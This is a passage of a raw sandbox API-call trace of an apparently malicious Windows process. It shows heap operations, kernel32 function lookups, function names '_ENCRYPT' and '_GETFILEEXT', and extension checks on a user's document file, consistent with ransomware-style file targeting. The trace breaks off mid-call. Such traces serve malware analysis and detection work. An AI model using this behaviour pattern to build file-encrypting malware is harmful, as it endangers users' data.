HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.089] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0178.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.090] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0178.091] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0178.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0178.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.092] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.093] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0178.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0178.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.093] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0178.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0178.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.093] CloseHandle (hObject=0x138) returned 1 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0178.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0178.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.094] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.095] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0178.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.095] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0178.095] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0178.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.096] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0178.096] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0178.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.096] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0178.096] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0178.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.096] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.096] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.096] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.096] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.096] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0ad840, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x96ac91b0, ftLastAccessTime.dwHighDateTime=0x1d5dda2, ftLastWriteTime.dwLowDateTime=0x96ac91b0, ftLastWriteTime.dwHighDateTime=0x1d5dda2, nFileSizeHigh=0x0, nFileSizeLow=0x9f51, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="hvT5kT0PFopfwSD QzN.pps", cAlternateFileName="HVT5KT~1.PPS")) returned 0x90add8 [0178.098] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.098] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.098] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0ad840, ftCreationTime.dwHighDateTime=0x1d5e7b0, ftLastAccessTime.dwLowDateTime=0x96ac91b0, ftLastAccessTime.dwHighDateTime=0x1d5dda2, 